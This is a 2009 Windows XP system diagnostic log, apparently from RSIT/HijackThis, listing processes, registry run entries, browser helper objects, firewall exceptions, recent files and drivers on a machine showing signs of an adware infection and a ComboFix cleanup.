    MSIE: Internet Explorer v7.00 (7.00.6000.16791)
    Boot mode: Normal
    
    Running processes:
    C:\WINDOWS\System32\smss.exe
    C:\WINDOWS\system32\csrss.exe
    C:\WINDOWS\system32\winlogon.exe
    C:\WINDOWS\system32\services.exe
    C:\WINDOWS\system32\lsass.exe
    C:\WINDOWS\system32\svchost.exe
    C:\WINDOWS\system32\svchost.exe
    C:\WINDOWS\System32\svchost.exe
    C:\WINDOWS\system32\svchost.exe
    C:\WINDOWS\system32\svchost.exe
    C:\WINDOWS\system32\svchost.exe
    C:\WINDOWS\system32\spoolsv.exe
    C:\Program Files\Fichiers communs\Autodesk Shared\Service\AdskScSrv.exe
    C:\Logs\Diskeeper\DkService.exe
    C:\Program Files\Java\jre6\bin\jqs.exe
    C:\Program Files\Fichiers communs\LightScribe\LSSrvc.exe
    V:\Logs\3dsMax8\mentalray\satellite\raysat_3dsmax8server.exe
    C:\Program Files\Microsoft LifeCam\MSCamSvc.exe
    C:\WINDOWS\system32\nvsvc32.exe
    C:\Program Files\Analog Devices\Core\smax4pnp.exe
    C:\Logs\Winamp\winampa.exe
    C:\Logs\DU Meter\DUMeter.exe
    C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
    C:\WINDOWS\system32\spool\drivers\w32x86\3\hpztsb07.exe
    C:\WINDOWS\system32\svchost.exe
    C:\Program Files\Java\jre6\bin\jusched.exe
    C:\WINDOWS\system32\ctfmon.exe
    C:\Program Files\Fichiers communs\Ahead\Lib\NMBgMonitor.exe
    C:\Logs\Winamp Remote\bin\OrbTray.exe
    C:\Logs\SuperCopier2\SuperCopier2.exe
    C:\Logs\Nokia\Nokia PC Suite 7\PCSuite.exe
    C:\Program Files\Fichiers communs\Ahead\Lib\NMIndexStoreSvr.exe
    C:\Logs\Winamp Remote\bin\Orb.exe
    C:\WINDOWS\system32\wbem\wmiapsrv.exe
    C:\WINDOWS\System32\alg.exe
    C:\Program Files\Fichiers communs\Ahead\Lib\NMIndexingService.exe
    C:\Program Files\PC Connectivity Solution\ServiceLayer.exe
    C:\Program Files\PC Connectivity Solution\Transports\NclUSBSrv.exe
    C:\Program Files\PC Connectivity Solution\Transports\NclRSSrv.exe
    C:\WINDOWS\System32\svchost.exe
    C:\Logs\mIRC\mirc.exe
    C:\logs\avg\avgwdsvc.exe
    C:\logs\avg\avgam.exe
    C:\logs\avg\avgrsx.exe
    C:\WINDOWS\explorer.exe
    C:\Logs\Mozilla Firefox\firefox.exe
    C:\Program Files\Windows Live\Messenger\msnmsgr.exe
    C:\Program Files\Windows Live\Contacts\wlcomm.exe
    C:\Logs\Mumble2\bin\dbus-daemon.exe
    V:\Steam\steam.exe
    C:\Program Files\Windows Live\Messenger\msnmsgr.exe
    C:\Documents and Settings\lml-mike\Bureau\RSIT.exe
    C:\WINDOWS\system32\wbem\wmiprvse.exe
    C:\Program Files\trend micro\lml-mike.exe
    
    R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www1.mini20.com/?tm=1&kw=Secure+Web+Search+Engine&KW1=Secure%20Web%20Search%20Engine&KW2=Best%20Malware%20Detection%20And%20Removal%20Software&searchbox=0&domainname=0&backfill=0
    R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = https://www.msn.com/fr-fr/?ocid=iehp
    R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = https://www.bing.com/?toHttps=1&redig=5FC791212101479BAFBE1A679848B1AF
    R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = https://www.bing.com/?toHttps=1&redig=5FC791212101479BAFBE1A679848B1AF
    R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = https://www.msn.com/fr-fr/?ocid=iehp
    R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Liens
    O2 - BHO: G DATA WebFilter Class - {0124123D-61B4-456f-AF86-78C53A0790C5} - (no file)
    O2 - BHO: (no name) - {5C255C8A-E604-49b4-9D64-90988571CECB} - (no file)
    O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre6\bin\ssv.dll
    O2 - BHO: Programme d'aide de l'Assistant de connexion Windows Live - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Fichiers communs\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
    O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre6\bin\jp2ssv.dll
    O2 - BHO: JQSIEStartDetectorImpl - {E7E6F031-17CE-4C07-BC86-EABFE594F69C} - C:\Program Files\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll
    O3 - Toolbar: (no name) - {0124123D-61B4-456f-AF86-78C53A0790C5} - (no file)
    O4 - HKLM\..\Run: [SoundMAXPnP] C:\Program Files\Analog Devices\Core\smax4pnp.exe
    O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartup
    O4 - HKLM\..\Run: [nwiz] nwiz.exe /install
    O4 - HKLM\..\Run: [WinampAgent] C:\Logs\Winamp\winampa.exe
    O4 - HKLM\..\Run: [DU Meter] C:\Logs\DU Meter\DUMeter.exe
    O4 - HKLM\..\Run: [DiskeeperSystray] "C:\Logs\Diskeeper\DkIcon.exe"
    O4 - HKLM\..\Run: [NeroFilterCheck] C:\Program Files\Fichiers communs\Ahead\Lib\NeroCheck.exe
    O4 - HKLM\..\Run: [LifeCam] "C:\Program Files\Microsoft LifeCam\LifeExp.exe"
    O4 - HKLM\..\Run: [VX6000] C:\WINDOWS\vVX6000.exe
    O4 - HKLM\..\Run: [HPDJ Taskbar Utility] C:\WINDOWS\system32\spool\drivers\w32x86\3\hpztsb07.exe
    O4 - HKLM\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\WINDOWS\system32\NvMcTray.dll,NvTaskbarInit
    O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre6\bin\jusched.exe"
    O4 - HKLM\..\Run: [QuickTime Task] "C:\Logs\QuickTime Alternative\QTTask.exe" -atboottime
    O4 - HKLM\..\Run: [AVG8_TRAY] C:\logs\avg\avgtray.exe
    O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\ctfmon.exe
    O4 - HKCU\..\Run: [msnmsgr] "C:\Program Files\Windows Live\Messenger\msnmsgr.exe" /background
    O4 - HKCU\..\Run: [BgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}] "C:\Program Files\Fichiers communs\Ahead\Lib\NMBgMonitor.exe"
    O4 - HKCU\..\Run: [Orb] "C:\Logs\Winamp Remote\bin\OrbTray.exe" /background
    O4 - HKCU\..\Run: [SuperCopier2.exe] C:\Logs\SuperCopier2\SuperCopier2.exe
    O4 - HKCU\..\Run: [PC Suite Tray] "C:\Logs\Nokia\Nokia PC Suite 7\PCSuite.exe" -onlytray
    O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SYSTEM')
    O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'Default user')
    O8 - Extra context menu item: E&xporter vers Microsoft Excel - res://C:\PROGRA~1\MICROS~4\Office12\EXCEL.EXE/3000
    O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre6\bin\jp2iexp.dll
    O9 - Extra 'Tools' menuitem: Console Java (Sun) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre6\bin\jp2iexp.dll
    O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~4\Office12\REFIEBAR.DLL
    O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
    O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
    O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
    O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
    O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://www.update.microsoft.com/...
    O17 - HKLM\System\CCS\Services\Tcpip\..\{8F84AFEF-B3CB-49E5-9B29-54622F44CD90}: NameServer = 192.168.1.1
    O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~1\FICHIE~1\Skype\SKYPE4~1.DLL
    O20 - AppInit_DLLs: antbve.dll
    O20 - Winlogon Notify: avgrsstarter - C:\WINDOWS\SYSTEM32\avgrsstx.dll
    O23 - Service: Adobe LM Service - Adobe Systems - C:\Program Files\Fichiers communs\Adobe Systems Shared\Service\Adobelmsvc.exe
    O23 - Service: Autodesk Licensing Service - Autodesk - C:\Program Files\Fichiers communs\Autodesk Shared\Service\AdskScSrv.exe
    O23 - Service: AVG8 WatchDog (avg8wd) - AVG Technologies CZ, s.r.o. - C:\logs\avg\avgwdsvc.exe
    O23 - Service: Diskeeper - Executive Software International, Inc. - C:\Logs\Diskeeper\DkService.exe
    O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Fichiers communs\InstallShield\Driver\1050\Intel 32\IDriverT.exe
    O23 - Service: Java Quick Starter (JavaQuickStarterService) - Sun Microsystems, Inc. - C:\Program Files\Java\jre6\bin\jqs.exe
    O23 - Service: LightScribeService Direct Disc Labeling Service (LightScribeService) - Hewlett-Packard Company - C:\Program Files\Fichiers communs\LightScribe\LSSrvc.exe
    O23 - Service: RaySat_3dsmax8 Server (mi-raysat_3dsmax8) - Unknown owner - V:\Logs\3dsMax8\mentalray\satellite\raysat_3dsmax8server.exe
    O23 - Service: NMIndexingService - Nero AG - C:\Program Files\Fichiers communs\Ahead\Lib\NMIndexingService.exe
    O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\system32\nvsvc32.exe
    O23 - Service: Pml Driver HPZ12 - HP - C:\WINDOWS\system32\HPZipm12.exe
    O23 - Service: Remote Packet Capture Protocol v.0 (experimental) (rpcapd) - CACE Technologies - C:\Program Files\WinPcap\rpcapd.exe
    O23 - Service: ServiceLayer - Nokia. - C:\Program Files\PC Connectivity Solution\ServiceLayer.exe
    
    --
    End of file - 8731 bytes
    
    ======Scheduled tasks folder======
    
    C:\WINDOWS\tasks\AppleSoftwareUpdate.job
    
    ======Registry dump======
    
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{0124123D-61B4-456f-AF86-78C53A0790C5}]
    
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{5C255C8A-E604-49b4-9D64-90988571CECB}]
    
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}]
    SSVHelper Class - C:\Program Files\Java\jre6\bin\ssv.dll [2008-11-10 320920]
    
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{9030D464-4C02-4ABF-8ECC-5164760863C6}]
    Programme d'aide de l'Assistant de connexion Windows Live - C:\Program Files\Fichiers communs\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-01-22 408448]
    
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{DBC80044-A445-435b-BC74-9C25C1C588A9}]
    Java(tm) Plug-In 2 SSV Helper - C:\Program Files\Java\jre6\bin\jp2ssv.dll [2008-11-10 34816]
    
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{E7E6F031-17CE-4C07-BC86-EABFE594F69C}]
    JQSIEStartDetectorImpl Class - C:\Program Files\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll [2008-11-10 73728]
    
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Toolbar]
    {0124123D-61B4-456f-AF86-78C53A0790C5}
    
    [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
    "SoundMAXPnP"=C:\Program Files\Analog Devices\Core\smax4pnp.exe [2006-12-18 868352]
    "NvCplDaemon"=C:\WINDOWS\system32\NvCpl.dll [2008-10-07 13574144]
    "nwiz"=nwiz.exe /install []
    "WinampAgent"=C:\Logs\Winamp\winampa.exe [2008-04-01 36352]
    "DU Meter"=C:\Logs\DU Meter\DUMeter.exe [2003-06-22 1303552]
    "DiskeeperSystray"=C:\Logs\Diskeeper\DkIcon.exe [2004-10-04 176216]
    "NeroFilterCheck"=C:\Program Files\Fichiers communs\Ahead\Lib\NeroCheck.exe [2006-01-12 155648]
    "LifeCam"=C:\Program Files\Microsoft LifeCam\LifeExp.exe [2006-06-30 269104]
    "VX6000"=C:\WINDOWS\vVX6000.exe [2006-06-30 994096]
    "HPDJ Taskbar Utility"=C:\WINDOWS\system32\spool\drivers\w32x86\3\hpztsb07.exe [2003-03-09 188416]
    "NvMediaCenter"=C:\WINDOWS\system32\NvMcTray.dll [2008-10-07 86016]
    "SunJavaUpdateSched"=C:\Program Files\Java\jre6\bin\jusched.exe [2008-11-10 136600]
    "QuickTime Task"=C:\Logs\QuickTime Alternative\QTTask.exe [2009-01-05 413696]
    "AVG8_TRAY"=C:\logs\avg\avgtray.exe [2009-03-17 1932568]
    
    [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
    "CTFMON.EXE"=C:\WINDOWS\system32\ctfmon.exe [2008-04-13 15360]
    "msnmsgr"=C:\Program Files\Windows Live\Messenger\msnmsgr.exe [2009-02-06 3885408]
    "BgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}"=C:\Program Files\Fichiers communs\Ahead\Lib\NMBgMonitor.exe [2006-12-23 143360]
    "Orb"=C:\Logs\Winamp Remote\bin\OrbTray.exe [2008-04-01 507904]
    "SuperCopier2.exe"=C:\Logs\SuperCopier2\SuperCopier2.exe [2006-07-07 1052672]
    "PC Suite Tray"=C:\Logs\Nokia\Nokia PC Suite 7\PCSuite.exe [2008-12-03 1205760]
    
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
    "AppInit_DLLS"="antbve.dll"
    
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\avgrsstarter]
    C:\WINDOWS\system32\avgrsstx.dll [2009-03-17 10520]
    
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\WgaLogon]
    C:\WINDOWS\system32\WgaLogon.dll [2008-09-05 267304]
    
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad]
    WPDShServiceObj - {AAA288BA-9A4C-45B0-95D7-94D524869DB5} - C:\WINDOWS\system32\WPDShServiceObj.dll [2006-10-18 133632]
    
    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\nm]
    
    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\nm.sys]
    
    [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System]
    "dontdisplaylastusername"=0
    "legalnoticecaption"=
    "legalnoticetext"=
    "shutdownwithoutlogon"=1
    "undockwithoutlogon"=1
    
    [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer]
    "NoDriveTypeAutoRun"=323
    "NoDriveAutoRun"=67108863
    "NoDrives"=0
    
    [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\explorer]
    "HonorAutoRunSetting"=
    "NoDriveAutoRun"=
    "NoDriveTypeAutoRun"=
    "NoDrives"=
    
    [HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\standardprofile\authorizedapplications\list]
    "%windir%\system32\sessmgr.exe"="%windir%\system32\sessmgr.exe:*:enabled:@xpsp2res.dll,-22019"
    "%windir%\Network Diagnostic\xpnetdiag.exe"="%windir%\Network Diagnostic\xpnetdiag.exe:*:Enabled:@xpsp3res.dll,-20000"
    "V:\Steam\SteamApps\lml_mike@hotmail.com\counter-strike source\hl2.exe"="V:\Steam\SteamApps\lml_mike@hotmail.com\counter-strike source\hl2.exe:*:Enabled:hl2"
    "C:\Logs\HLSW\hlsw.exe"="C:\Logs\HLSW\hlsw.exe:*:Enabled:HLSW Application"
    "C:\Logs\ABC\abc.exe"="C:\Logs\ABC\abc.exe:*:Enabled:abc"
    "V:\Steam\steam.exe"="V:\Steam\steam.exe:*:Enabled:Steam"
    "C:\Program Files\Fichiers communs\Nokia\Service Layer\A\nsl_host_process.exe"="C:\Program Files\Fichiers communs\Nokia\Service Layer\A\nsl_host_process.exe:*:Enabled:Nokia Service Layer Host Process "
    "C:\Program Files\Nokia\Nokia Software Updater\nsu_ui_client.exe"="C:\Program Files\Nokia\Nokia Software Updater\nsu_ui_client.exe:*:Enabled:Nokia Software Updater"
    "C:\WINDOWS\system32\mmc.exe"="C:\WINDOWS\system32\mmc.exe:*:Enabled:Microsoft Management Console"
    "V:\eMule\emule.exe"="V:\eMule\emule.exe:*:Enabled:eMule"
    "C:\Program Files\Microsoft LifeCam\LifeCam.exe"="C:\Program Files\Microsoft LifeCam\LifeCam.exe:*:Enabled:LifeCam.exe"
    "C:\Program Files\Microsoft LifeCam\LifeExp.exe"="C:\Program Files\Microsoft LifeCam\LifeExp.exe:*:Enabled:LifeExp.exe"
    "V:\Quake III Arena\quake3.exe"="V:\Quake III Arena\quake3.exe:*:Enabled:quake3"
    "C:\Logs\Mozilla Firefox\firefox.exe"="C:\Logs\Mozilla Firefox\firefox.exe:*:Enabled:Firefox"
    "C:\Logs\FlashFXP\flashfxp.exe"="C:\Logs\FlashFXP\flashfxp.exe:*:Enabled:FlashFXP"
    "C:\Logs\Winamp Remote\bin\Orb.exe"="C:\Logs\Winamp Remote\bin\Orb.exe:*:Enabled:Orb"
    "C:\Logs\Winamp Remote\bin\OrbTray.exe"="C:\Logs\Winamp Remote\bin\OrbTray.exe:*:Enabled:OrbTray"
    "C:\Logs\Winamp Remote\bin\OrbStreamerClient.exe"="C:\Logs\Winamp Remote\bin\OrbStreamerClient.exe:*:Enabled:Orb Stream Client"
    "V:\Logs\backburner\monitor.exe"="V:\Logs\backburner\monitor.exe:*:Enabled:backburner 2.3 monitor"
    "V:\Logs\backburner\manager.exe"="V:\Logs\backburner\manager.exe:*:Enabled:backburner 2.3 manager"
    "V:\Logs\backburner\server.exe"="V:\Logs\backburner\server.exe:*:Enabled:backburner 2.3 server"
    "V:\Steam\SteamApps\lml_mike@hotmail.com\half-life 2 deathmatch\hl2.exe"="V:\Steam\SteamApps\lml_mike@hotmail.com\half-life 2 deathmatch\hl2.exe:*:Enabled:hl2"
    "C:\Program Files\Microsoft Office\Office12\OUTLOOK.EXE"="C:\Program Files\Microsoft Office\Office12\OUTLOOK.EXE:*:Enabled:Microsoft Office Outlook"
    "V:\Steam\SteamApps\lml_mike@hotmail.com\synergy\hl2.exe"="V:\Steam\SteamApps\lml_mike@hotmail.com\synergy\hl2.exe:*:Enabled:hl2"
    "V:\Steam\SteamApps\lml_mike@hotmail.com\zombie panic! source\hl2.exe"="V:\Steam\SteamApps\lml_mike@hotmail.com\zombie panic! source\hl2.exe:*:Enabled:hl2"
    "C:\Logs\mIRC\mirc.exe"="C:\Logs\mIRC\mirc.exe:*:Enabled:mIRC"
    "C:\Program Files\Java\jre6\bin\java.exe"="C:\Program Files\Java\jre6\bin\java.exe:*:Enabled:Java(TM) Platform SE binary"
    "C:\Documents and Settings\All Users\Application Data\Kaspersky Lab Setup Files\Kaspersky Internet Security 2009\English\setup.exe"="C:\Documents and Settings\All Users\Application Data\Kaspersky Lab Setup Files\Kaspersky Internet Security 2009\English\setup.exe:*:Enabled:Kaspersky Internet Security 2009 Setup"
    "V:\Shaun White Snowboarding\ShaunWhiteSnowboardingGame.exe"="V:\Shaun White Snowboarding\ShaunWhiteSnowboardingGame.exe:*:Enabled:Shaun White Snowboarding Game"
    "V:\Shaun White Snowboarding\ShaunWhiteSnowboarding.exe"="V:\Shaun White Snowboarding\ShaunWhiteSnowboarding.exe:*:Enabled:Shaun White Snowboarding Update"
    "C:\Program Files\Windows Live\Messenger\msnmsgr.exe"="C:\Program Files\Windows Live\Messenger\msnmsgr.exe:*:Enabled:Windows Live Messenger"
    "C:\Logs\avg\avgam.exe"="C:\Logs\avg\avgam.exe:*:Enabled:avgam.exe"
    "C:\Logs\avg\avgupd.exe"="C:\Logs\avg\avgupd.exe:*:Enabled:avgupd.exe"
    "C:\Documents and Settings\lml-mike\Application Data\Macromedia\Flash Player\www.macromedia.com\bin\octoshape\octoshape.exe"="C:\Documents and Settings\lml-mike\Application Data\Macromedia\Flash Player\www.macromedia.com\bin\octoshape\octoshape.exe:*:Enabled:Octoshape add-in for Adobe Flash Player"
    "P:\Prince of Persia\Prince of Persia.exe"="P:\Prince of Persia\Prince of Persia.exe:*:Enabled:Prince of Persia Dx"
    "P:\Prince of Persia\PrinceOfPersia_Launcher.exe"="P:\Prince of Persia\PrinceOfPersia_Launcher.exe:*:Enabled:Prince of Persia Update"
    "C:\Program Files\Skype\Phone\Skype.exe"="C:\Program Files\Skype\Phone\Skype.exe:*:Enabled:Skype"
    "P:\Mirror's Edge\Binaries\MirrorsEdge.exe"="P:\Mirror's Edge\Binaries\MirrorsEdge.exe:*:Enabled:Mirror's Edge™"
    "C:\WINDOWS\Winend\mirc.exe"="C:\WINDOWS\Winend\mirc.exe:*:Disabled:mIRC"
    "V:\Steam\SteamApps\common\left 4 dead\left4dead.exe"="V:\Steam\SteamApps\common\left 4 dead\left4dead.exe:*:Enabled:Left 4 Dead"
    
    [HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\domainprofile\authorizedapplications\list]
    "%windir%\system32\sessmgr.exe"="%windir%\system32\sessmgr.exe:*:enabled:@xpsp2res.dll,-22019"
    "%windir%\Network Diagnostic\xpnetdiag.exe"="%windir%\Network Diagnostic\xpnetdiag.exe:*:Enabled:@xpsp3res.dll,-20000"
    "C:\Program Files\Windows Live\Messenger\msnmsgr.exe"="C:\Program Files\Windows Live\Messenger\msnmsgr.exe:*:Enabled:Windows Live Messenger"
    
    ======List of files/folders created in the last 1 months======
    
    2009-03-17 16:05:39 ----SHD---- C:\RECYCLER
    2009-03-17 14:42:30 ----A---- C:\ComboFix.txt
    2009-03-17 14:39:10 ----A---- C:\Boot.bak
    2009-03-17 14:39:07 ----RASHD---- C:\cmdcons
    2009-03-17 14:38:17 ----A---- C:\WINDOWS\zip.exe
    2009-03-17 14:38:17 ----A---- C:\WINDOWS\SWREG.exe
    2009-03-17 14:38:17 ----A---- C:\WINDOWS\sed.exe
    2009-03-17 14:38:17 ----A---- C:\WINDOWS\NIRCMD.exe
    2009-03-17 14:38:17 ----A---- C:\WINDOWS\grep.exe
    2009-03-17 14:38:16 ----A---- C:\WINDOWS\VFIND.exe
    2009-03-17 14:38:16 ----A---- C:\WINDOWS\SWXCACLS.exe
    2009-03-17 14:38:16 ----A---- C:\WINDOWS\SWSC.exe
    2009-03-17 14:38:16 ----A---- C:\WINDOWS\fdsv.exe
    2009-03-17 14:37:39 ----D---- C:\WINDOWS\ERDNT
    2009-03-17 14:37:39 ----D---- C:\ComboFix
    2009-03-17 14:35:39 ----D---- C:\Qoobox
    2009-03-17 12:41:56 ----D---- C:\Program Files\trend micro
    2009-03-17 12:41:55 ----D---- C:\rsit
    2009-03-17 03:01:50 ----HDC---- C:\WINDOWS\$NtUninstallKB960225$
    2009-03-17 03:01:43 ----HDC---- C:\WINDOWS\$NtUninstallKB958690$
    2009-03-17 03:01:18 ----HDC---- C:\WINDOWS\$NtUninstallKB959772_WM11$
    2009-03-09 13:11:53 ----D---- C:\WINDOWS\Winend
    2009-03-03 18:39:31 ----N---- C:\WINDOWS\IsUninst.Exe
    2009-03-03 18:38:36 ----A---- C:\WINDOWS\IsUn040c.exe
    2009-03-01 13:58:44 ----A---- C:\WINDOWS\system32\CmdLineExt03.dll
    2009-03-01 12:08:27 ----HD---- C:\$AVG8.VAULT$
    2009-02-28 16:11:34 ----A---- C:\WINDOWS\system32\avgrsstx.dll.old
    2009-02-28 16:11:34 ----A---- C:\WINDOWS\system32\avgrsstx.dll
    2009-02-28 16:11:21 ----D---- C:\Program Files\AVG
    2009-02-28 03:00:31 ----HDC---- C:\WINDOWS\$NtUninstallKB967715$
    2009-02-21 08:48:18 ----D---- C:\Documents and Settings\lml-mike\Application Data\DeepBurner
    2009-02-20 16:12:39 ----A---- C:\WINDOWS\NAVIGMA.INI
    
    ======List of files/folders modified in the last 1 months======
    
    2009-03-17 14:42:35 ----D---- C:\WINDOWS\Temp
    2009-03-17 14:42:32 ----D---- C:\WINDOWS\system32
    2009-03-17 14:42:31 ----D---- C:\WINDOWS
    2009-03-17 14:41:23 ----A---- C:\WINDOWS\system.ini
    2009-03-17 14:40:34 ----D---- C:\WINDOWS\system32\drivers
    2009-03-17 14:40:34 ----D---- C:\WINDOWS\AppPatch
    2009-03-17 14:40:32 ----D---- C:\Program Files\Fichiers communs
    2009-03-17 14:39:10 ----RASH---- C:\boot.ini
    2009-03-17 14:38:39 ----A---- C:\WINDOWS\SchedLgU.Txt
    2009-03-17 14:37:46 ----D---- C:\WINDOWS\system32\CatRoot2
    2009-03-17 14:37:38 ----D---- C:\WINDOWS\Prefetch
    2009-03-17 12:41:56 ----RD---- C:\Program Files
    2009-03-17 12:40:18 ----D---- C:\Documents and Settings\lml-mike\Application Data\mIRC
    2009-03-17 03:01:53 ----HD---- C:\WINDOWS\inf
    2009-03-17 03:01:52 ----RSHDC---- C:\WINDOWS\system32\dllcache
    2009-03-17 03:01:47 ----A---- C:\WINDOWS\imsins.BAK
    2009-03-17 03:01:12 ----SHD---- C:\WINDOWS\Installer
    2009-03-17 03:01:09 ----D---- C:\Documents and Settings\All Users\Application Data\Microsoft Help
    2009-03-17 00:41:12 ----D---- C:\Documents and Settings\lml-mike\Application Data\teamspeak2
    2009-03-16 15:57:04 ----HD---- C:\WINDOWS\$hf_mig$
    2009-03-09 04:24:15 ----A---- C:\WINDOWS\NeroDigital.ini
    2009-03-09 03:46:36 ----D---- C:\WINDOWS\system32\DirectX
    2009-03-09 03:46:21 ----RSD---- C:\WINDOWS\assembly
    2009-03-09 03:44:24 ----D---- C:\Program Files\Fichiers communs\Wise Installation Wizard
    2009-03-09 03:44:12 ----D---- C:\Program Files\AGEIA Technologies
    2009-03-09 03:43:23 ----D---- C:\Documents and Settings\lml-mike\Application Data\HLSW
    2009-03-08 21:07:04 ----D---- C:\Documents and Settings\lml-mike\Application Data\Skype
    2009-03-08 21:00:06 ----D---- C:\Documents and Settings\lml-mike\Application Data\skypePM
    2009-03-08 01:11:30 ----A---- C:\WINDOWS\system32\wrap_oal.dll
    2009-03-08 01:11:30 ----A---- C:\WINDOWS\system32\OpenAL32.dll
    2009-03-06 20:54:12 ----D---- C:\Documents and Settings\lml-mike\Application Data\Mumble
    2009-03-06 02:15:38 ----HD---- C:\Program Files\InstallShield Installation Information
    2009-03-04 12:36:51 ----D---- C:\Logs
    2009-03-03 18:41:55 ----D---- C:\Documents and Settings\lml-mike\Application Data\DAEMON Tools Pro
    2009-03-01 20:41:49 ----AD---- C:\Documents and Settings\All Users\Application Data\TEMP
    2009-02-28 16:11:21 ----D---- C:\Documents and Settings\All Users\Application Data\avg8
    2009-02-28 16:10:20 ----D---- C:\Program Files\Fichiers communs\G DATA
    2009-02-28 16:06:09 ----SD---- C:\Documents and Settings\lml-mike\Application Data\Microsoft
    2009-02-25 21:54:59 ----A---- C:\WINDOWS\system32\MRT.exe
    2009-02-20 19:05:09 ----D---- C:\Program Files\Fichiers communs\Microsoft Shared
    2009-02-18 16:58:17 ----RSD---- C:\WINDOWS\Fonts
    
    ======List of drivers (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======
    
    R1 AFS2K;AFS2k; C:\WINDOWS\system32\drivers\AFS2K.sys [2008-07-08 82380]
    R1 AvgLdx86;AVG AVI Loader Driver x86; C:\WINDOWS\System32\Drivers\avgldx86.sys [2009-03-17 325640]
    R1 AvgMfx86;AVG On-access Scanner Minifilter Driver x86; C:\WINDOWS\System32\Drivers\avgmfx86.sys [2009-02-28 27656]
    R1 intelppm;Pilote de processeur Intel; C:\WINDOWS\system32\DRIVERS\intelppm.sys [2008-04-13 40576]
    R2 acedrv11;acedrv11; \??\C:\WINDOWS\system32\drivers\acedrv11.sys []
    R2 GDTdiInterceptor;GDTdiInterceptor; \??\C:\WINDOWS\system32\drivers\GDTdiIcpt.sys []
    R3 ADIDTSFiltService;ADI DTS Filter Service; C:\WINDOWS\system32\drivers\adidts.sys [2006-12-08 139776]
